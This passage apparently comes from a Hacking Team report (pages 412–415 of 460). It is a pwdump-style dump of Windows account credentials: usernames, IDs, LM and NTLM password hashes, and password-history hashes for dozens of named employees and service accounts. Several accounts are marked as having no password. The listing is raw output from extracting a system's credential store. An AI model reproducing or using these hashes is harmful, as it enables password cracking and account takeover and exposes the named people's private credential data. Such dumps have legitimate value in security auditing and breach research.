ODubroeucq_history_2:1204:B2F50A2D8FAEBE1CC81667E9D738C5D9:6AAAAD2DFF77F606C4B6D0279C3DE000:::
ODubroeucq_history_3:1204:B2F50A2D8FAEBE1C9C5014AE4718A7EE:4EDA02EEA3D40A6AD710896E5CEFB305:::
ODubroeucq_history_4:1204:B2F50A2D8FAEBE1CFF17365FAF1FFE89:33058C815735991FCCCD4AE4322C6C36:::
ODubroeucq_history_5:1204:B2F50A2D8FAEBE1C1AA818381E4E281B:16683DBFD72A02D85B8C726B2A2A90DB:::
ODubroeucq_history_6:1204:B2F50A2D8FAEBE1C1D71060D896B7A46:590A3E8B12E80A8E0D57EC878FA54B1F:::
ODubroeucq_history_7:1204:B2F50A2D8FAEBE1CC2265B23734E0DAC:8F7786B9EA33A02C6C697C43AABFBFAB:::
ODubroeucq_history_8:1204:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
PriceFeed:1209:657EA0D54453BB81246850AA692B684E:291E9F9F6F00F751CEDF9BA75218C71E:::
PriceFeed_history_0:1209:657EA0D54453BB81246850AA692B684E:575ADEA166F625B8B3C3D9589BF645FF:::
PriceFeed_history_1:1209:657EA0D54453BB81246850AA692B684E:575ADEA166F625B8B3C3D9589BF645FF:::
PriceFeed_history_2:1209:657EA0D54453BB81246850AA692B684E:575ADEA166F625B8B3C3D9589BF645FF:::
NRobson:1211:9592446D40A7EFF4CDE365171B4C947E:443321ABCF80D8953C1EB2E9DCCA07B9:::
NRobson_history_0:1211:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
NRobson_history_1:1211:496199C6C9A5BF0A3114D6E857AD0712:A30887561ECA243E2FA64FFA3481FB99:::
NRobson_history_2:1211:C31BACDE6BC4C52FC423DDDA8FA7F32D:63B2B710F91A84DE5995340C7C9D9D40:::
NRobson_history_3:1211:13B001E67F47EC219B062DC732697A38:2F8625D7A7A241FEA72DBDCF1AF6F1BD:::
NRobson_history_4:1211:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
NRobson_history_5:1211:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
NRobson_history_6:1211:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
NRobson_history_7:1211:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
NRobson_history_8:1211:82B8E3B9488EECA4AE9F3CD5A806145E:12918DDBDDFD2F11295813A857367B0B:::
NRobson_history_9:1211:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
CMalerba:1213:D0C132E13959BE801947BBCEC930B7FD:E9E5BA7AB01F205E01FCE2655E8E5B56:::
CMalerba_history_0:1213:3322B8D16D4A6689EBADE3EC1090C5F0:8B7D34A71B352F14F58D117A919D55FC:::
CMalerba_history_1:1213:3B14E56494FD36FD0CFDB8D49491F4D0:E1B5FE580C6B0E9186C13297124B4CF2:::
CMalerba_history_2:1213:07E1936DC1273174056FD00B44A0C257:5613F63F503096AB3595F90440EBD8DC:::
CMalerba_history_3:1213:5D7775516F379F941612A210664D7C25:7EC17CD49ABEC034C853F6AF209D02E1:::
CMalerba_history_4:1213:40C692B5D454C58F146490F0313E5A1B:2D944E4A2DD7CC3A2A89623EE196C704:::
CMalerba_history_5:1213:5EB9213C5086DC25C2265B23734E0DAC:A8D90DFF5CF7A80288614E1206430A35:::
CMalerba_history_6:1213:7CFFAD37BA5C0354BE5C79B9E1006584:D0FC36C372B910340BF6410ED0CF9B7F:::
CMalerba_history_7:1213:7CFFAD37BA5C0354BE5C79B9E1006584:D0FC36C372B910340BF6410ED0CF9B7F:::
CMalerba_history_8:1213:5F0163C44F9C5A6EC2265B23734E0DAC:C9FD12C016A371654011396D801E0ECA:::
CMalerba_history_9:1213:C9AFCB9AD9E68EF7E183065E7A96A4A6:94CD24F35967DFE14B4FAA617AD2A1CE:::
CMalerba_history_10:1213:55F7E873942E6BC3C2265B23734E0DAC:9A74ABE7C5C65E036CB72FD9A6D2F1AB:::
ZBoston:1217:367609D22010C2E3CCF9155E3E7DB453:655731C17C6FC325B0656EA688730C63:::
ZBoston_history_0:1217:101E41C6AC42479A1A787A994B5CE317:B04324F4BD78A365AF236A20EBC37465:::
ZBoston_history_1:1217:101E41C6AC42479ACEC18980D4FFADA7:A5E5E97186A4BC3079AE9388A9D3962A:::
ZBoston_history_2:1217:3BCD8319460BD7BF09752A3293831D17:181169EC99E56FECC3875DF7C6EF43A4:::
ZBoston_history_3:1217:3BCD8319460BD7BF36077A718CCDF409:03081FE87F558F13D11B6A28D6EF8B4E:::
ZBoston_history_4:1217:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ZBoston_history_5:1217:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ZBoston_history_6:1217:3BCD8319460BD7BF7C3113B4A1A5E3A0:2142DEAA5CBAFE82E7855D722B9E85F2:::
ZBoston_history_7:1217:3BCD8319460BD7BFC81667E9D738C5D9:866C20BA60DD502F47F691E3A994C7C6:::
ZBoston_history_8:1217:3BCD8319460BD7BF9C5014AE4718A7EE:D55542AE4B8B197C0F419E1697030608:::
ZBoston_history_9:1217:3BCD8319460BD7BFFF17365FAF1FFE89:56F22C2EB80ABD863C6ED4505DE93A17:::
ZBoston_history_10:1217:3BCD8319460BD7BF1AA818381E4E281B:6863751409286F2AE3CFF33991869881:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 412 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
AConlan:1218:41AD7FFE98EA007FBD202287D5B6A554:A5B870031852EFEB2FF929B9B7760628:::
AConlan_history_0:1218:3C74D8A3BEB43757BD202287D5B6A554:7A700F6A398E201A792CDF374C7E9AA1:::
AConlan_history_1:1218:D98D45B054CC7B88BD202287D5B6A554:6A15FBE653B3B10CAB0E91595789DE2C:::
AConlan_history_2:1218:07C309A3077FC04CA751691F48A80B36:A1681017CEF12E48213BB96BA1B4694F:::
AConlan_history_3:1218:83F295CD9333C859A751691F48A80B36:4ABD1D61E1AF58486A3B5484F5E18D7B:::
AConlan_history_4:1218:37D78DF3ABACFBE8A751691F48A80B36:EB0393B1EECF9FF5230C9F938AEBE9F8:::
AConlan_history_5:1218:6C532D939FF75813A751691F48A80B36:484A4E8E8EA90408F861A2114E8F7FAC:::
AConlan_history_6:1218:B4D4E1FD883C49F0A751691F48A80B36:17676CC0EF00925C562331BC1A2B771E:::
AConlan_history_7:1218:00CB05B6A0BE48DEA751691F48A80B36:014996DB3B2F921D6D4B6BA48CFB5626:::
AConlan_history_8:1218:F0581EFFFFCD2305A751691F48A80B36:FF69F7411AFC1729F38F95074FDBAC9A:::
AConlan_history_9:1218:28784398F9D994EDA751691F48A80B36:B104D5470D342BAA0148496B23A1E4FF:::
AConlan_history_10:1218:EB4F830077D0149AA751691F48A80B36:AA26D983F8865F7D3358C9E8D6E5C064:::
RLedderhof:1219:NO PASSWORD*********************:NO PASSWORD*********************:::
KMommers:1220:NO PASSWORD*********************:NO PASSWORD*********************:::
HCretumarie:1221:NO PASSWORD*********************:NO PASSWORD*********************:::
ALaski:1222:NO PASSWORD*********************:NO PASSWORD*********************:::
PMorris:1223:NO PASSWORD*********************:NO PASSWORD*********************:::
FPion:1224:NO PASSWORD*********************:NO PASSWORD*********************:::
PSabin:1225:NO PASSWORD*********************:NO PASSWORD*********************:::
MBentes:1226:NO PASSWORD*********************:NO PASSWORD*********************:::
MMadeira:1227:NO PASSWORD*********************:NO PASSWORD*********************:::
JSchaefer:1228:NO PASSWORD*********************:NO PASSWORD*********************:::
SSchmidt:1229:NO PASSWORD*********************:NO PASSWORD*********************:::
MWieacker:1230:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
MWieacker_history_0:1230:3B5295680CE1013A20A025678B8B9957:NO PASSWORD*********************:::
BGolding:1231:NO PASSWORD*********************:NO PASSWORD*********************:::
RSmith:1232:NO PASSWORD*********************:NO PASSWORD*********************:::
MVlad:1234:FA2397237F47EA3F93BE3A377C968336:5AE665052F79DECE1ACF5A727D6B35F2:::
MVlad_history_0:1234:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
OMaze:1235:0CCAFA359CB12AFC27BCBF149915A329:F9B3AB4D775B9A25882E01B4A2E175CB:::
OMaze_history_0:1235:7460DA6ADCE89444200B6E1BB8996B58:3BD39E4FF7D75E1D1BC3423B6B9BCB15:::
OMaze_history_1:1235:532A0D8E61FB9FC46E45D5F10408CFBD:4F9CCBE5CC6A772522C7ADC872B00D80:::
OMaze_history_2:1235:277938B5FC4B385793E28745B8BF4BA6:EDBEAD4FA2CB6D1C23AFDDC9AEE9FDE1:::
OMaze_history_3:1235:23F6D8027FD809B6DD4218F5E59DD23A:2997DECE0198EF91320E12A7F74BEDD0:::
OMaze_history_4:1235:7D03A080B3F853B46363D5FBC40D491E:3507C4B88CE3417DB610DF7B1D5AFE8F:::
OMaze_history_5:1235:907DA0ED4AC7088B8358F3D2C80C1DC5:EF9D84BA5E1C2150C6AA8581CEEDC128:::
OMaze_history_6:1235:27D30F6BA626F75FE72C57EF50F76A05:961416ECEB371E35DCE5782086D5EFE3:::
OMaze_history_7:1235:D0A02040355CCAF6A113ECB4DE839999:C9FDFEFE48ADB105D8E694D3BFECD169:::
OMaze_history_8:1235:3A1692F2040B4D85BAD32E867B8AF3AC:8D9F0C2EB3C0C15C1363715D8702C610:::
OMaze_history_9:1235:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
OMaze_history_10:1235:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
ADebruyne:1237:NO PASSWORD*********************:NO PASSWORD*********************:::
JDecorte:1238:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
JDecorte_history_0:1238:0180F5C066394BBCB124636211F4646A:NO PASSWORD*********************:::
PSenes:1239:NO PASSWORD*********************:NO PASSWORD*********************:::
JVangoidsenhoven:1240:NO PASSWORD*********************:NO PASSWORD*********************:::
Reuters:1257:9A56CCA5C2E79AE0CCF9155E3E7DB453:4C2AF434FD1A199B96E4FFDABA707CE8:::
Reuters_history_0:1257:F2F2234BBC1A8783F2F2234BBC1A8783:D848A111B5ED573390ACED6E019EE725:::
Reuters_history_1:1257:9A56CCA5C2E79AE0CCF9155E3E7DB453:4C2AF434FD1A199B96E4FFDABA707CE8:::
Reuters_history_2:1257:9A56CCA5C2E79AE0CCF9155E3E7DB453:4C2AF434FD1A199B96E4FFDABA707CE8:::
Reuters_history_3:1257:F2F2234BBC1A8783AAD3B435B51404EE:FCA8B4D4C20C911111BE53BA6F344092:::
Reuters_history_4:1257:5D58E3D510FF7AE8514E23F63A970376:B131B301E4103B57824C51F8F315BB4C:::
PCTDatafeed:1258:8EFCDE5F654F4988E3517AE030154398:0F23C7B7B19CB1F50B7031C09D499756:::
iQuoter:1273:623ED582EDB7F7D134EFFCAF3B9E6C9C:7D76623ED376E41DEC6376E39BD5D2AE:::
iQuoter_history_0:1273:FDD2428E372F6EF996CDF4482849BC03:06FC54E9CA6C82F4A2B1993D06853AF9:::
iQuoter_history_1:1273:FDD2428E372F6EF905791B7211FB0712:1DAEB91341D715090B9F5CB29D52F03A:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 413 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IndexDev:1277:14A9B43C5CCAB3C304628421AE55BC6C:2ED64A2BCC58F34954621DEE15B94976:::
IndexDev_history_0:1277:14A9B43C5CCAB3C304628421AE55BC6C:2ED64A2BCC58F34954621DEE15B94976:::
IndexDev_history_1:1277:14A9B43C5CCAB3C304628421AE55BC6C:2ED64A2BCC58F34954621DEE15B94976:::
IndexDev_history_2:1277:14A9B43C5CCAB3C304628421AE55BC6C:2ED64A2BCC58F34954621DEE15B94976:::
IndexDev_history_3:1277:FBFF04F303746C99AAD3B435B51404EE:25F56F4A73EB21CFBAA1D2333C2D57B9:::
B2CTest:1283:4E02A6BEE5ECE02D504428E203455524:0EFF5CB986A2A915FFD7B5F8A9C992F3:::
B2CTest_history_0:1283:3DA30765E99E1265F6034634FEB282CC:1968C0CF18C71DF3A7B6381BCE6BE576:::
B2CTest_history_1:1283:4DDD12D1FD59F2C82FDDD48F74F50C51:675B0DB9AEE27C550E6D090EC5614FD1:::
B2CTest_history_2:1283:4E02A6BEE5ECE02D504428E203455524:0EFF5CB986A2A915FFD7B5F8A9C992F3:::
Sfinge:1293:CF7D9CF568FFFEB26FB9A7EF37043CD6:1A09049F432FB034312D8618429344B9:::
PFraccaro:1300:367609D22010C2E31D71060D896B7A46:9CE3EF55C0534649082F2B6B9F9A43D1:::
PFraccaro_history_0:1300:367609D22010C2E3C81667E9D738C5D9:D63649BFA654987C6A44C57AF2911804:::
PFraccaro_history_1:1300:367609D22010C2E39C5014AE4718A7EE:DD168176BC9D462032F1A3D87FF32FD3:::
PFraccaro_history_2:1300:367609D22010C2E3FF17365FAF1FFE89:9B63592D067E096A731FF5E52B414E3B:::
PFraccaro_history_3:1300:367609D22010C2E31AA818381E4E281B:D2348FF4BC068FFAEEE545A8000E7BD3:::
PFraccaro_history_4:1300:367609D22010C2E31D71060D896B7A46:9CE3EF55C0534649082F2B6B9F9A43D1:::
PFraccaro_history_5:1300:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PFraccaro_history_6:1300:168ABE5DDAB9571A7920C5D817A72D61:724FC2F4951BCB66CD0414CAD4ABC7E1:::
PFraccaro_history_7:1300:168ABE5DDAB9571A10350407506F2C10:5BCD63B161483101CDB4FCBB47966485:::
PFraccaro_history_8:1300:4E13E696C5922986D0DC9A5593688B90:02AC3232B03F9157F13124A7F954FF5B:::
PFraccaro_history_9:1300:168ABE5DDAB9571AEA36BEE89599AE2E:55958BDC619D1C4B37F5806807A0070B:::
PFraccaro_history_10:1300:168ABE5DDAB9571A1B087C18752BDBEE:85F0DA3E780C24A2E54965AF417AC376:::
SDigiovanni:1301:16DC1C5B1EFF3F97D091585EB847A3C9:21C4FA4AB9F1A4EB05AA3121CC2C3B62:::
SDigiovanni_history_0:1301:16DC1C5B1EFF3F9797BA4642035CE6CF:75CC1A24EB0FD93F2094B4C9E13ED7A3:::
SDigiovanni_history_1:1301:16DC1C5B1EFF3F9717EAF2C9B9A1A5EA:61FCF4772756D8EE5159E72CABA96D6D:::
SDigiovanni_history_2:1301:16DC1C5B1EFF3F97A901B4F238206255:DADA2A9BD6095BC4786D0E034E118609:::
SDigiovanni_history_3:1301:16DC1C5B1EFF3F97CE347282CA0065E0:11A5DE132078DBA90A6F8A6E23AE871F:::
SDigiovanni_history_4:1301:16DC1C5B1EFF3F97D5E81C3047D31048:DAD246EA864319EA06DEF1601DD39E8A:::
SDigiovanni_history_5:1301:16DC1C5B1EFF3F974F6739E6CEAA436C:8CFB9EB0F5299EA4C20EC0B35C20114C:::
SDigiovanni_history_6:1301:16DC1C5B1EFF3F9742DD6FE28B7CF4AC:1161C1C3A7552C96F3F5D4C7A93D4D8B:::
SDigiovanni_history_7:1301:16DC1C5B1EFF3F97A8B81CD26E77AC6C:C8C10C40FD11A210862B77F01A48CD4A:::
SDigiovanni_history_8:1301:16DC1C5B1EFF3F9798BEBE5BA19858D2:62269CF9D208F630A903DEEAA49D99A3:::
SDigiovanni_history_9:1301:16DC1C5B1EFF3F97E82D39CF4992CE9D:89B30FC4B72A9EDF3B3D795DEBE0CBDE:::
SDigiovanni_history_10:1301:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AJauregui:1302:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AJauregui_history_0:1302:367609D22010C2E3984BDBFD2C427432:2B77C4B29E2CF025AB66C8DF76A0FB52:::
AJauregui_history_1:1302:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AJauregui_history_2:1302:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AJauregui_history_3:1302:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AJauregui_history_4:1302:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AJauregui_history_5:1302:0E08C83EA8C7313463A53F94730FDEAA:NO PASSWORD*********************:::
ARodriguez:1303:BF888137B695ECA79219DE60DCFBC0DA:5D27B379D352E3CDB85854B4826D7C03:::
ARodriguez_history_0:1303:1666F1056A320045C2265B23734E0DAC:BA477A51F3DA5DFD988A529B59D51078:::
ARodriguez_history_1:1303:39CAE11CB87FD707C94CFD1C941C189D:808F800B25079A4A060C813D2E0032B8:::
ARodriguez_history_2:1303:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ARodriguez_history_3:1303:39CAE11CB87FD707C94CFD1C941C189D:808F800B25079A4A060C813D2E0032B8:::
ARodriguez_history_4:1303:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ARodriguez_history_5:1303:87DCF6D25772BAD848A7C45AA5FBB255:NO PASSWORD*********************:::
CSanbasilio:1304:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CSanbasilio_history_0:1304:CD5F26EC71ABE6175762A1F2629493C9:NO PASSWORD*********************:::
PSanchez:1305:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PSanchez_history_0:1305:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PSanchez_history_1:1305:219ADDEEF6325DB62D64AB8651865891:NO PASSWORD*********************:::
PSchwartz:1306:NO PASSWORD*********************:NO PASSWORD*********************:::
lmeneghesso_a:1308:NO PASSWORD*********************:D1C2739E2C63BDB03591E3293FD9CE16:::
lmeneghesso_a_history_0:1308:18340F2266A315ACC5CF0271C8539B71:9B65DBCE149FFA58183DA05A9C85241E:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 414 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
lmeneghesso_a_history_1:1308:NO PASSWORD*********************:D6DDD107369FAC9C44B54F8AAF366FB3:::
lmeneghesso_a_history_2:1308:NO PASSWORD*********************:27EAF3897D58E325DA877D1FD962139A:::
lmeneghesso_a_history_3:1308:760FB9BE9BFF2CBD4FD5A8E431D242C2:FC13EA578D25480AB5CD57DA2C81F7B5:::
lmeneghesso_a_history_4:1308:15F612A74AC2A8168AC17BFC3E4CFC8D:C1D4D7BEFEC53F9A0BAC1F7599727A3E:::
lmeneghesso_a_history_5:1308:NO PASSWORD*********************:8CA53AE567AD56617487776283A765C6:::
lmeneghesso_a_history_6:1308:NO PASSWORD*********************:36EF79641F2FD944103DE2A8FE45AE60:::
lmeneghesso_a_history_7:1308:A46D102B04467AAB39EEBE9DA0F54BC0:B76799BED70D3773477DBFECF307AE79:::
lmeneghesso_a_history_8:1308:NO PASSWORD*********************:6330CF439CCE35A66B9A19D18FFDF582:::
lmeneghesso_a_history_9:1308:361B117201F07E1C94D9A4D9019727AE:2FC269FFB828AC095BDE05E83BBEE644:::
lmeneghesso_a_history_10:1308:72E83DB6727FC4E5E9B1A9928825372D:B34E21F68A078B8DAB851B5E483E959F:::
lgrandini_a:1309:4E669A896FD2EFE74E669A896FD2EFE7:2A3461880E5945108D73C3BE3BEBF9D3:::
lgrandini_a_history_0:1309:FCCB4B2EF0E2B9F4B75E0C8D76954A50:E06BBB83293DE66EF568AA8C78A8F844:::
lgrandini_a_history_1:1309:NO PASSWORD*********************:ADE646DF1213BBB3D42FB14F9D06F349:::
lgrandini_a_history_2:1309:25B25A96A5860EE79DD8B64945D1EDEF:842BB1081EE0206F4563526DF587A1CC:::
lgrandini_a_history_3:1309:453F421A7782B4D439CA3745F8E7A7E9:3FFD15E834BE663F40F4125D91B47105:::
lgrandini_a_history_4:1309:03F1FAA84ACC969ABB9DE2377B27CA59:808B0C1959C1B0A0BD559F41E4728DDB:::
lgrandini_a_history_5:1309:453F421A7782B4D439CA3745F8E7A7E9:3FFD15E834BE663F40F4125D91B47105:::
lgrandini_a_history_6:1309:7C03C0F57AA88B569A67A213CD192E0C:F871E0F65B1EA890D3E1CAF5CDBDDB2B:::
lgrandini_a_history_7:1309:22A543B9681F9122273CA5346294CEA4:BFFC54D44A96605B9AA3F18EA68C04A7:::
lgrandini_a_history_8:1309:1F17359B7FF4D2E8EFB303C2F126705E:42960450871B813EE19FFD0390EB25EC:::
lgrandini_a_history_9:1309:505F20A60B4706B0CCF9155E3E7DB453:CF78627EF770A6EBD590D4091AEED85D:::
lgrandini_a_history_10:1309:25B25A96A5860EE79DD8B64945D1EDEF:842BB1081EE0206F4563526DF587A1CC:::
sbhular_a:1310:8E020DCD38CA3D924897C118903F6F6D:9FB9CE77D3873A4C693B4F86A29D5E96:::
sbhular_a_history_0:1310:31AD98E34C89C5058DEC69DD19EE7B7C:2F366CDBD3CB4F8094692A7316502312:::
sbhular_a_history_1:1310:8E020DCD38CA3D9297BD178E117F9F37:24B6BBE7A8A1F0A8F8EF199F28D1F051:::
sbhular_a_history_2:1310:FBF65D8C94EE8EADC796C856B502FF15:D42553A5ABA4B521E4C53CBFDAFC9602:::
mbiazzo_a:1311:2EC7DD597E04C457EB0A1CAD553CBBC3:330DF6EE822F26DE0B85D8D53F310963:::
mbiazzo_a_history_0:1311:87B07BA1EF8A5CCF22CD15A916971709:ABF47F0AD031E12221F72385639C8218:::
mbiazzo_a_history_1:1311:E3509E98DD2180A722CD15A916971709:8A960ACF7BEC9B510729D68988251663:::
mbiazzo_a_history_2:1311:7CBA2C6E6D1A4EF222CD15A916971709:E1BC56B15D0777FD35FFBDD0C96DCE79:::
mbiazzo_a_history_3:1311:NO PASSWORD*********************:E6804C0B6A0B375DA6EC56B3F9D931E9:::
mbiazzo_a_history_4:1311:NO PASSWORD*********************:163E8A33C2E48CD55DB7CEC1A4EAAD07:::
mbiazzo_a_history_5:1311:NO PASSWORD*********************:E6804C0B6A0B375DA6EC56B3F9D931E9:::
mbiazzo_a_history_6:1311:NO PASSWORD*********************:F33A241FA87AC2C701F378D648E7D9EB:::
mbiazzo_a_history_7:1311:093140252F803AFF1FCD0BA22A426058:10ECEB3C1DFF0D1568A034445A30D85F:::
mbiazzo_a_history_8:1311:EFA0C6A7200BB7B5891B0392E2B845C7:DA694D4F4C00B184CE3A5DC1E1034CB9:::
mbiazzo_a_history_9:1311:388E3463A30D94D56A8B799DF50571D3:48D4564B64EF6AA429098F7D9213C507:::
mbiazzo_a_history_10:1311:ECBB7616C6626CB83EBDEC852BF05D53:0E608E3AF0EBA81C942E4245394A9320:::
lredgwell_a:1313:C37E1E35315186ABCCF9155E3E7DB453:9F158316A66DDE3F3F138EBBA40B0851:::
lredgwell_a_history_0:1313:C37E1E35315186ABB757BF5C0D87772F:2D4600367C1C604C49312F14BFDA9509:::
lredgwell_a_history_1:1313:C37E1E35315186ABCCF9155E3E7DB453:9F158316A66DDE3F3F138EBBA40B0851:::
lredgwell_a_history_2:1313:C37E1E35315186AB4207FD0DF35A59A8:64F1870C9BCCAB602C34F743A719A4F4:::
lredgwell_a_history_3:1313:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
lredgwell_a_history_4:1313:FBF65D8C94EE8EADC796C856B502FF15:D42553A5ABA4B521E4C53CBFDAFC9602:::
pdiruscio:1315:298E783C833C98437E79904A893ECC82:EC2968C596B4BD8F5961139DD3893F48:::
pdiruscio_history_0:1315:E0244B63E79F418458D7A73179D9CF0F:A4DEAE72C25A4951B065C556B5BCE399:::
pdiruscio_history_1:1315:9DD31192287A6235A8B6D67741752E99:86E3799BDB392B1F850C1976C8D67A27:::
pdiruscio_history_2:1315:3C0DCA9780F7382A2E5A8BD4D7FBFF8D:1E426269097B293A7F9472B102B7D7B2:::
pdiruscio_history_3:1315:83B047B06E3DFA62C029EDDAF359F8FE:F78D1BA991C0CD46E0545C17B2704C54:::
pdiruscio_history_4:1315:FCCEFA827279EC668DA4F30B404CB012:135C04EDBD55FF2E51381598260DF343:::
pdiruscio_history_5:1315:65F27505C654D1EEE589D6819C41F1AD:D0B6DBDF8652012323AA9CF9616F244F:::
pdiruscio_history_6:1315:7A8F26C7F07F8B8EE589D6819C41F1AD:733D4EC59581774A48DB942E6FD7D728:::
pdiruscio_history_7:1315:F6EC3706FDAC6CEAD01DF6E4556E5F41:0FBE7E092B70F26D28709554D1015BD8:::
pdiruscio_history_8:1315:3E2BCA546A037A1711335F80C97C7181:D5BE1697B8B96936FA56F6A279D62601:::
pdiruscio_history_9:1315:F671583503E1959178DF7C3EA8FEC756:AD1C99F52567C1EBDA62ADB2FEE6ED24:::
pdiruscio_history_10:1315:07DC47022CDCBC6375D3349E71AA9EA8:B46C228E4C96162A535A274B864DC6F8:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 415 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
GSandrin:1326:93B8776368E65F26F460284AB1601DE1:75F42C6486007C14550BC03C40969C5D:::
GSandrin_history_0:1326:93B8776368E65F26BDFA37019E7A5916:4DE5C76F61762C6E74FDCD5760F741E3:::
GSandrin_history_1:1326:93B8776368E65F263BE1F70D283C17AF:14E3DAB94BC71D7995953FC58C69CE8C:::
GSandrin_history_2:1326:93B8776368E65F26FEACFE9C95C42171:98D44917174E0D235A25C301B4E8FF77:::
GSandrin_history_3:1326:93B8776368E65F267F1666BBBB2EB3C6:A43DDED8E0A7447FE7DE370BFF141771:::
GSandrin_history_4:1326:93B8776368E65F26DFA140E91DDD10B2:3C76AC8BE545D3FBC60F47CD0B6AD912:::
GSandrin_history_5:1326:93B8776368E65F26761BD132F3CE5404:81D74C398920D228104E7911824F1883:::
GSandrin_history_6:1326:93B8776368E65F26219B79173D88AC6C:AF1CEA11E2FCD2910CDA6CA842FEF83F:::
GSandrin_history_7:1326:93B8776368E65F26E275D58356BFBD79:D340942346D6F533E69DFC9E29F32801:::
GSandrin_history_8:1326:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
GSandrin_history_9:1326:93B8776368E65F26754D4844EFE37EC4:BCFB58572E15EA3FA5AD0E95CECFD4C4:::
GSandrin_history_10:1326:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
RHanna:1332:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
EAbdisa:1334:NO PASSWORD*********************:NO PASSWORD*********************:::
MMaertens:1335:8B060974271306FCB7ABDE01DBB609D9:8C76247F9BAE0778881B40EAB87FE27A:::
MMaertens_history_0:1335:8B060974271306FCB7ABDE01DBB609D9:8C76247F9BAE0778881B40EAB87FE27A:::
MMaertens_history_1:1335:367609D22010C2E34207FD0DF35A59A8:826BAB5A34E4670C7439A1000C945468:::
MMaertens_history_2:1335:367609D22010C2E34207FD0DF35A59A8:826BAB5A34E4670C7439A1000C945468:::
MMaertens_history_3:1335:367609D22010C2E3C2265B23734E0DAC:519BF46BD1A59FC25548D7495E051EC1:::
MMaertens_history_4:1335:1ACFDB4CC6C40CC1B02BEE33426B3BE5:NO PASSWORD*********************:::
SVandekerckhove:1336:760FB9BE9BFF2CBD4FD5A8E431D242C2:FC13EA578D25480AB5CD57DA2C81F7B5:::
SVandekerckhove_history_0:1336:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
SVandekerckhove_history_1:1336:36FA144B9DC6B04EF8FCE4BEA7ECD1F9:NO PASSWORD*********************:::
SOliveira:1337:NO PASSWORD*********************:NO PASSWORD*********************:::
SSachs:1338:NO PASSWORD*********************:NO PASSWORD*********************:::
GAlessandro:1341:458C73D2FAAE3110B0BB996AC72E02B1:822A35DFB62E9561C4557629E4B11356:::
GAlessandro_history_0:1341:E4EF9C71B42DA9EC7C00CF191F9EDF0D:E2768E1CC4DE97478AEB49EA285E5E5C:::
GAlessandro_history_1:1341:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
GAlessandro_history_2:1341:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
GAlessandro_history_3:1341:6D9DD2BD858222131E66324F3E85FAB8:31FFFDD270F0C06D71B754109ADB4A30:::
GAlessandro_history_4:1341:DC336A701829E11F967B214F55C726AC:D6AD4ABF9D21A13AFA7A653FE38B5940:::
GAlessandro_history_5:1341:679CFA89370790BA6D8249D834DC0938:95FD243FEDF6249279CB341C2809CEC7:::
GAlessandro_history_6:1341:DFDFF86835AA804396E6EC22F15F8C7D:D18D43F95C22960EA323387364A137C4:::
